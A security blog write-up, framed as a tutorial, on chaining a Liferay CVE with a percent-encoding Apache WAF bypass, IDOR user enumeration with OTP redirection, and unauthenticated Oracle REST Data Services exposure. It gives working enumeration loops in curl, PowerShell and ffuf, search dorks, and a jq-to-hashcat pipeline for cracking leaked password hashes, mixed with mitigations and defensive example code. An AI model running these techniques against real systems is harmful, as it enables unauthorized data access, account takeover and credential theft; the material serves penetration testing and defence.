How I Bypassed an Apache WAF and Liferay Authentication to Expose an Entire API (And You Can Too) + Video

Introduction:

Chaining an unpatched Liferay CVE with a character‑level URL encoding bypass against an Apache Web Application Firewall (WAF) allowed unauthenticated access to a headless administrative API. This attack vector, combined with IDOR vulnerabilities on digital onboarding endpoints and misconfigured Oracle REST Data Services (ORDS) modules, demonstrates how seemingly low‑severity quirks in encoding and access control can lead to full data exposure.

Learning Objectives:

  • Understand how character‑level URL encoding can bypass Apache WAF rules and reach unauthenticated API endpoints.
  • Exploit Insecure Direct Object References (IDOR) to retrieve sensitive user data and live OTP codes.
  • Identify and query unauthenticated Oracle REST Data Services modules exposing password hashes and HR records.

You Should Know:

1. Chaining Liferay CVE + Apache WAF Encoding Bypass

The attack chains a known unpatched Liferay CVE (for example CVE‑2020‑7961, a deserialization flaw in Liferay's JSON web services, or a comparable authentication bypass) with a subtle WAF evasion technique. The Apache WAF blocks obvious patterns such as ../, ;, or %00 when they appear literally in the request, but it matches its rules against the raw, still percent‑encoded request line. A path in which every character is individually percent‑encoded therefore matches none of its signatures, while the application server decodes it before routing.

Step‑by‑step guide:

  1. Identify a Liferay instance behind an Apache WAF (mod_security or similar).
  2. Craft a request to the headless administrative API, e.g., /api/jsonws/invoke.
  3. Encode each character of the sensitive API path using Python:

     payload = "/api/jsonws/invoke"
     encoded = ''.join(f'%{ord(c):02X}' for c in payload)
     print(encoded)
     # %2F%61%70%69%2F%6A%73%6F%6E%77%73%2F%69%6E%76%6F%6B%65


4. Send the request using `curl` on Linux (curl sends the path byte‑for‑byte, so the encoding survives):

curl -i "http://target.com/%61%70%69/%6A%73%6F%6E%77%73/%69%6E%76%6F%6B%65"

Two practical caveats for this step. First, the fully encoded string from step 3 starts with %2F; appended to `http://target.com/` it decodes to `//api/jsonws/invoke`, so strip the leading slash or, as above, leave the slashes literal. Second, Apache httpd answers 404 to an encoded slash (%2F) in the path unless `AllowEncodedSlashes` is set to `On` or `NoDecode` (the default is `Off`), which is the main reason to encode only the letters. Finally, Liferay's JSON web services invoker takes the service method and its parameters either in the path (/api/jsonws/<service>/<method>) or in the body of a POST to /api/jsonws/invoke, so the write‑up's `?method=add-user&userId=1` sketch is not a literal invocation; the exact call depends on the CVE being chained. The point of this step is that the request reaches the endpoint at all.

5. If the WAF matches its rules against the request line without percent‑decoding it, the encoded path looks like nothing in its signature list, while Liferay decodes it before routing. The encoding only gets the request past the WAF; the unauthenticated access itself comes from the unpatched CVE. A WAF that decodes once before matching is not fooled by single encoding (it would take double encoding, %25xx, to slip past it, and a WAF that rejects leftover %‑sequences after decoding catches that as well).

6. On Windows (PowerShell), test with:

Invoke-WebRequest -Uri "http://target.com/%61%70%69/%6A%73%6F%6E%77%73/%69%6E%76%6F%6B%65" -Method GET

Check the outgoing request in a proxy: .NET's Uri class may normalize percent‑encoded unreserved characters (%61 back to a) before the request leaves, which silently undoes the bypass.

Mitigation: Normalize the URI before rule matching (percent‑decode, then normalize the path; in ModSecurity that is the t:urlDecodeUni and t:normalizePath transformations on the rules that inspect REQUEST_URI, and rejecting requests that still contain %‑sequences after decoding covers double encoding), and apply strict authentication on every API endpoint regardless of how the path is spelled.
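
The decode‑order mismatch that steps 3 to 5 rely on, modelled in Python as an added example (this is not code from the write‑up, from Liferay or from ModSecurity): a toy WAF that matches its rule against the raw request line, the backend's single percent‑decode, and a hardened check that decodes to a fixed point before matching. The blocked‑path regex and the inputs are assumptions for illustration.

```python
"""
Added example (not from the original write-up): why a per-character
percent-encoded path slips past a WAF that matches on the raw request
line, and what the check looks like when the WAF normalizes first.

Assumptions (illustrative, not Liferay or ModSecurity code): the WAF is a
regex over the path, the backend decodes with urllib.parse.unquote.
"""
import re
from urllib.parse import unquote

# Paths the toy WAF is supposed to keep unauthenticated clients away from
# (leading slash repeated, because "/" + "%2F..." decodes to "//api/...").
BLOCKED_PATH_RE = re.compile(r"^/+api/jsonws(/|$)", re.IGNORECASE)


def encode_every_char(path: str) -> str:
    """Percent-encode every character, as the write-up's one-liner does."""
    return "".join(f"%{ord(c):02X}" for c in path)


def naive_waf_blocks(raw_path: str) -> bool:
    """Rule applied to the request line as received: no decoding at all."""
    return bool(BLOCKED_PATH_RE.search(raw_path))


def backend_path(raw_path: str) -> str:
    """What the application server routes on: a single percent-decode."""
    return unquote(raw_path)


def normalized_waf_blocks(raw_path: str) -> bool:
    """Hardened rule: decode until the string stops changing (bounded),
    deny anything still carrying %-sequences, then match on the same
    representation the backend will see."""
    decoded = raw_path
    for _ in range(3):                     # bounded: never loops on hostile input
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "%" in decoded:                     # leftover encoding after 3 rounds: deny
        return True
    return bool(BLOCKED_PATH_RE.search(decoded))


def simulate(raw_path: str) -> dict:
    """Report what each layer does with one raw request path."""
    return {
        "naive_waf_blocks": naive_waf_blocks(raw_path),
        "normalized_waf_blocks": normalized_waf_blocks(raw_path),
        "backend_sees": backend_path(raw_path),
    }


if __name__ == "__main__":
    plain = "/api/jsonws/invoke"
    single = encode_every_char(plain)      # %2F%61%70...
    double = encode_every_char(single)     # %25%32%46... (each '%' becomes %25)
    for p in (plain, single, double):
        print(p, "->", simulate(p))
```

The naive rule passes both the single‑ and double‑encoded forms while the backend still routes them to the same handler; the normalized rule catches both. The "deny on leftover %" choice is deliberately strict (it also rejects a legitimate literal percent sign), which is the trade‑off a real ruleset tunes per endpoint.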

2. IDOR on Digital Onboarding Endpoints

An IDOR vulnerability exists when an endpoint accepts a direct reference (e.g., customerId=123) without verifying ownership. In this case, the onboarding endpoint also leaked live OTPs to the attacker’s inbox because the email address was part of the same user object.

Step‑by‑step guide:

  1. Intercept the onboarding request using Burp Suite or OWASP ZAP.
  2. Observe a parameter like `customerId=1001`.
  3. Change the value to another number (e.g., 1002) and forward the request.
  4. The response returns the victim's full name; if the same endpoint also accepts an `email` field, setting it to an attacker‑controlled address makes the next OTP go there.

5. Automate enumeration with a Python script (this loop only reads the status endpoint; it does not touch the `email` field):

import requests

session = requests.Session()
session.headers["Authorization"] = "Bearer <jwt>"   # the tester's own low-privilege token

for cid in range(1000, 2000):
    r = session.get("https://target.com/onboarding/status",
                    params={"customerId": cid}, timeout=10)
    if r.status_code == 200 and "realName" in r.text:
        print(f"ID {cid}: {r.json()['realName']}")

6. On Windows, use `curl` in a batch file loop (inside a .bat file the loop variable is written `%%i`; at an interactive prompt it is `%i`):

@echo off
for /l %%i in (1000,1,2000) do curl -s "https://target.com/onboarding/status?customerId=%%i" -H "Authorization: Bearer <jwt>"

Mitigation: Implement proper access controls (server‑side) and never expose internal identifiers directly; use UUIDs or opaque tokens.

3. Differential Oracle for Full User Enumeration

The same IDOR endpoint acts as a differential oracle – returning different error messages or HTTP status codes for valid vs. invalid identifiers. This allows an attacker to map the entire user base.

Step‑by‑step guide:

  1. Send two requests: one with a valid `customerId` (HTTP 200 + user data) and one with an invalid ID (HTTP 404 or “not found”).
  2. Use Burp Intruder with a list of potential IDs, filtering by response length or status code.

3. Automate with `ffuf` (Linux):

ffuf -u "https://target.com/onboarding/status?customerId=FUZZ" -w ids.txt -mc 200 -fs 0

4. For Windows, use `Invoke-WebRequest` in PowerShell to measure response size (`-SkipCertificateCheck` exists in PowerShell 6+ only; `Invoke-WebRequest` raises an error on 4xx responses, so the try/catch keeps the loop going):

1000..2000 | ForEach-Object { try { $r = Invoke-WebRequest -Uri "https://target.com/onboarding/status?customerId=$_" -Method GET -SkipCertificateCheck; if ($r.Content.Length -gt 100) { Write-Host "Valid ID: $_" } } catch {} }

Mitigation: Return identical error responses for both valid and invalid identifiers; rate‑limit and log enumeration attempts.
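
The IDOR of section 2 and the differential oracle of section 3 are the same handler seen from two angles, so one added example covers both (this is illustrative code, not the onboarding application's): a status lookup in its IDOR‑prone form next to a hardened form that checks ownership server‑side, addresses records by opaque identifiers, and returns one identical response for "does not exist" and "not yours". The in‑memory store, record fields and identifiers are constructed for the example; no web framework is involved.

```python
"""
Added example (not from the original write-up): an onboarding "status"
lookup in its IDOR-prone form next to a hardened form. Store, record
shapes and ids are constructed for illustration. Each handler takes the
authenticated caller's id plus the client-supplied key and returns
(status, body), standing in for a framework route.
"""
import secrets
from typing import Callable, Tuple

Response = Tuple[int, dict]

# Constructed sample records: sequential customerId as in the write-up,
# plus an opaque public_id that the hardened handler exposes instead.
CUSTOMERS = {
    1001: {"realName": "Ada Example", "email": "ada@example.invalid",
           "public_id": "c7f1a9e2b4d04c3e"},
    1002: {"realName": "Bob Sample", "email": "bob@example.invalid",
           "public_id": "9a0d3b5e6f7c8d10"},
}
PUBLIC_INDEX = {rec["public_id"]: cid for cid, rec in CUSTOMERS.items()}

# One fixed response for every failure: missing, foreign, malformed.
NOT_FOUND: Response = (404, {"error": "not found"})


def new_public_id() -> str:
    """Mint an opaque identifier (64 random bits) instead of a row number."""
    return secrets.token_hex(8)


def vulnerable_status(caller_id: int, customer_id: int) -> Response:
    """IDOR: trusts the client's customerId and never compares it with the
    caller. The 200/404 split also makes it a differential oracle."""
    rec = CUSTOMERS.get(customer_id)
    if rec is None:
        return NOT_FOUND
    return 200, {"realName": rec["realName"], "email": rec["email"]}


def hardened_status(caller_id: int, public_id: str) -> Response:
    """Opaque key, server-side ownership check, single failure response."""
    cid = PUBLIC_INDEX.get(public_id)
    if cid is None or cid != caller_id:
        return NOT_FOUND          # same status and body for both failure modes
    rec = CUSTOMERS[cid]
    return 200, {"realName": rec["realName"], "email": rec["email"]}


def leaks_existence(handler: Callable[..., Response], caller_id: int,
                    foreign_key, missing_key) -> bool:
    """True when the handler answers 'exists but not mine' and 'does not
    exist' differently, i.e. it can be used to enumerate the id space."""
    return handler(caller_id, foreign_key) != handler(caller_id, missing_key)


if __name__ == "__main__":
    me = 1001
    print("vulnerable, foreign id:", vulnerable_status(me, 1002))
    print("vulnerable is oracle:", leaks_existence(vulnerable_status, me, 1002, 1999))
    print("hardened, own id:", hardened_status(me, CUSTOMERS[me]["public_id"]))
    print("hardened, foreign id:", hardened_status(me, CUSTOMERS[1002]["public_id"]))
    print("hardened is oracle:",
          leaks_existence(hardened_status, me, CUSTOMERS[1002]["public_id"], "0" * 16))
```

`leaks_existence` is the check a reviewer or tester can run against any handler: the hardened version returns the same tuple for a foreign id and for an unknown one, so response length and status code no longer say anything about which ids exist. Response timing is a separate channel (a record that exists costs a lookup) and is the reason the rate limiting and logging in the mitigation above still matter.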

4. Unauthenticated Oracle REST Data Services (ORDS) Exposure

Misconfigured ORDS modules can expose entire database tables via RESTful endpoints without authentication. Here, user password hashes, HR records, and operational data were directly accessible.

Step‑by‑step guide:

  1. Discover exposed ORDS endpoints by fuzzing common paths such as /ords/hr/employees, /ords/scott/emp, or /ords/<schema>/users, where <schema> is the alias of the database schema ORDS was enabled for.

2. Query the endpoint using `curl` (Linux):

curl -i "https://target.com/ords/hr/employees" -H "Accept: application/json"

3. If unauthenticated, it returns a JSON array of employee records including `PASSWORD_HASH` columns.
4. Extract hashes and crack them with `hashcat` (Linux). `jq -r` writes the raw strings (without `-r` every line is wrapped in quotes and hashcat rejects it), and `-m 0` is unsalted MD5, so pick the mode that matches the hash format you actually see (100 for SHA‑1, 1400 for SHA‑256, 3200 for bcrypt). Note that an ORDS collection is paginated (`hasMore` plus a `next` link), so a single request returns only the first page:

curl -s "https://target.com/ords/hr/employees" -H "Accept: application/json" | jq -r '.items[].password_hash' > hashes.txt
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

5. On Windows, use PowerShell to parse JSON and output to file:

$response = Invoke-RestMethod -Uri "https://target.com/ords/hr/employees" -Method GET
$response.items.password_hash | Out-File -FilePath hashes.txt

Mitigation: Enable ORDS authentication (Basic, OAuth2, or custom) and apply least‑privilege database accounts for each REST module.
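
Before anything goes to a cracker it helps to know which columns actually hold hashes and of which kind, and to pull every page rather than the first one. The following is an added example (not code from the write‑up or from ORDS): it walks an ORDS collection through its `links[rel=next]` pagination and flags hash‑like columns. The page shape (`items`, `hasMore`, `links`) is what ORDS AutoREST returns for a collection; the sample pages, the base URL and the column names are constructed for the example, and the fetch function is injected so it runs offline or, with `http_fetch`, against a live module.

```python
"""
Added example (not from the original write-up): walk an ORDS collection
page by page and flag columns whose values look like password hashes.
Sample pages, URLs and column names are constructed for illustration.
"""
import json
import re
import urllib.request
from typing import Callable, Dict, Iterable, List

# Hash shapes worth flagging: hex digests (MD5 / SHA-1 / SHA-256) and
# modular-crypt style strings (bcrypt, sha512crypt, PBKDF2 variants).
HASH_PATTERNS = {
    "hex-md5": re.compile(r"^[0-9a-f]{32}$", re.I),
    "hex-sha1": re.compile(r"^[0-9a-f]{40}$", re.I),
    "hex-sha256": re.compile(r"^[0-9a-f]{64}$", re.I),
    "bcrypt": re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"),
    "sha512crypt": re.compile(r"^\$6\$"),
    "pbkdf2": re.compile(r"^\$pbkdf2"),
}

BASE = "https://target.example/ords/hr/employees/"   # assumed, not a real host

# Constructed sample pages (the two MD5s are the digests of "password" and "123456").
SAMPLE_PAGES = {
    BASE: {
        "items": [
            {"employee_id": 1, "email": "ada@example.invalid",
             "password_hash": "5f4dcc3b5aa765d61d8327deb882cf99"},
            {"employee_id": 2, "email": "bob@example.invalid",
             "password_hash": "e10adc3949ba59abbe56e057f20f883e"},
        ],
        "hasMore": True, "limit": 2, "offset": 0, "count": 2,
        "links": [{"rel": "self", "href": BASE},
                  {"rel": "next", "href": BASE + "?offset=2"}],
    },
    BASE + "?offset=2": {
        "items": [
            {"employee_id": 3, "email": "cy@example.invalid",
             "password_hash": "$2b$12$" + "C" * 53},
        ],
        "hasMore": False, "limit": 2, "offset": 2, "count": 1,
        "links": [{"rel": "self", "href": BASE + "?offset=2"}],
    },
}


def offline_fetch(url: str) -> dict:
    """Fetcher backed by the constructed pages above."""
    return SAMPLE_PAGES[url]


def http_fetch(url: str) -> dict:
    """Fetcher for a live module; assumes it answers without auth, as in the finding."""
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


def walk_collection(start_url: str, fetch: Callable[[str], dict],
                    max_pages: int = 1000) -> List[dict]:
    """Follow rel=next links until hasMore is false; returns every item."""
    items, url, seen = [], start_url, set()
    for _ in range(max_pages):
        if url in seen:          # a self-referencing next link would otherwise loop forever
            break
        seen.add(url)
        page = fetch(url)
        items.extend(page.get("items", []))
        nxt = next((l["href"] for l in page.get("links", []) if l.get("rel") == "next"), None)
        if not page.get("hasMore") or nxt is None:
            break
        url = nxt
    return items


def hash_like_columns(items: Iterable[dict], min_ratio: float = 0.8) -> Dict[str, str]:
    """Map column name -> hash family for columns where at least min_ratio of
    the non-empty string values match a pattern; 'mixed' when more than one
    family is present (a single hashcat mode would then miss part of it)."""
    totals: Dict[str, int] = {}
    families: Dict[str, Dict[str, int]] = {}
    for row in items:
        for col, val in row.items():
            if not isinstance(val, str) or not val:
                continue
            totals[col] = totals.get(col, 0) + 1
            for fam, rx in HASH_PATTERNS.items():
                if rx.match(val):
                    counts = families.setdefault(col, {})
                    counts[fam] = counts.get(fam, 0) + 1
                    break
    flagged = {}
    for col, fams in families.items():
        if sum(fams.values()) / totals[col] >= min_ratio:
            flagged[col] = "mixed" if len(fams) > 1 else next(iter(fams))
    return flagged


if __name__ == "__main__":
    rows = walk_collection(BASE, offline_fetch)
    print(len(rows), "rows; hash-like columns:", hash_like_columns(rows))
```

On the constructed data the walker returns all three rows across both pages and reports `password_hash` as `mixed`, which is exactly the case where running `hashcat -m 0` over the whole column would silently skip the bcrypt entries. The same `hash_like_columns` pass, run by the defending team over its own ORDS modules, is a quick way to find which exposed collections contain credential material.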

5. Hardening Against Chained Attacks

To prevent these vulnerabilities from being combined, implement layered defenses:

  • Decode before matching at the WAF – in ModSecurity, apply `t:urlDecodeUni,t:normalizePath` on the rules that inspect REQUEST_URI, and reject malformed sequences with `SecRule REQUEST_URI "@validateUrlEncoding" "phase:1,id:100,deny"` (that operator only checks that the encoding is valid; it does not decode for you). In Nginx, `$uri` is already the percent‑decoded, normalized path, so access rules should match on `$uri` rather than on `$request_uri`.
  • Rate limit IDOR endpoints – using `iptables` (Linux) or `New-NetFirewallRule` (Windows) with dynamic IP blocking, and ideally keyed on the authenticated identity as well, since a single account enumerating ids from many addresses is the common case.
  • Test discovered ORDS endpoints for injection – `sqlmap` checks parameters for SQL injection, not for missing authentication; for the exposure itself, an unauthenticated request to the module (section 4) is the test:
    sqlmap -u "https://target.com/ords/hr/employees?id=1" --dbms=Oracle --level=3

  • Implement API gateways (e.g., Kong, Tyk) with token introspection before requests reach the WAF or Liferay.

6. Exploiting Passive Reconnaissance for ORDS

Attackers often find exposed ORDS modules through Google dorks or Shodan. Use the following dorks to assess your own exposure:

– `intitle:"Oracle REST Data Services" "Welcome"`
– `inurl:"/ords/" "employees"`
– `"/ords/schema" filetype:json`

Internal scanning command (Linux): Nmap ships no ORDS‑specific NSE script (there is no `http-ords-enum`), so run the generic `http-enum` for a first pass and then request the ORDS paths directly, as the PowerShell loop below does:

nmap -p 80,443 --script http-enum target.com

Windows equivalent with `Invoke-WebRequest`:

$urls = @("/ords/hr/", "/ords/scott/", "/ords/sys/")
foreach ($u in $urls) { try { $r = Invoke-WebRequest -Uri "https://target.com$u" -Method GET -TimeoutSec 5; if ($r.StatusCode -eq 200) { Write-Host "Exposed: $u" } } catch {} }

What Undercode Say:

  • Chaining is the new critical: Single vulnerabilities are often low‑risk, but chaining an encoding bypass with an unpatched CVE and an IDOR turns a minor issue into full account takeover and data breach.
  • Default configurations kill you: Oracle REST Data Services is secure when locked down, but the default “anyone can query” setting is alarmingly common. Always assume your ORDS modules are exposed until proven otherwise.

Analysis: The findings above (WAF encoding bypass, IDOR with its enumeration oracle, and ORDS exposure) reflect a broader trend: developers trust WAFs and API gateways to handle encoding, ignoring that application servers decode differently. IDORs persist because internal IDs are convenient – but they are also a goldmine for attackers. Meanwhile, ORDS exposure shows that database‑to‑REST automation often bypasses traditional security reviews. Real‑world attacks rarely use one exploit; they weave together misconfigurations, weak access controls, and protocol ambiguities. The only defense is holistic testing that mirrors attacker chain‑building.

Prediction:

As headless APIs and microservices dominate enterprise stacks, encoding bypass attacks will become a standard part of every penetration tester’s toolkit. WAF vendors will respond with mandatory multi‑stage decoding, but legacy systems will remain vulnerable for years. Additionally, IDOR on OTP delivery endpoints will be weaponized in large‑scale SIM‑swap and account takeover campaigns. Finally, exposure of Oracle REST Data Services will decline only when cloud scanners automatically flag unauthenticated ORDS modules as “critical severity” – a shift that is likely within 12–18 months as bug bounty platforms adjust their severity guidelines.

Reported By: Jeronimovicente New – Hackers Feeds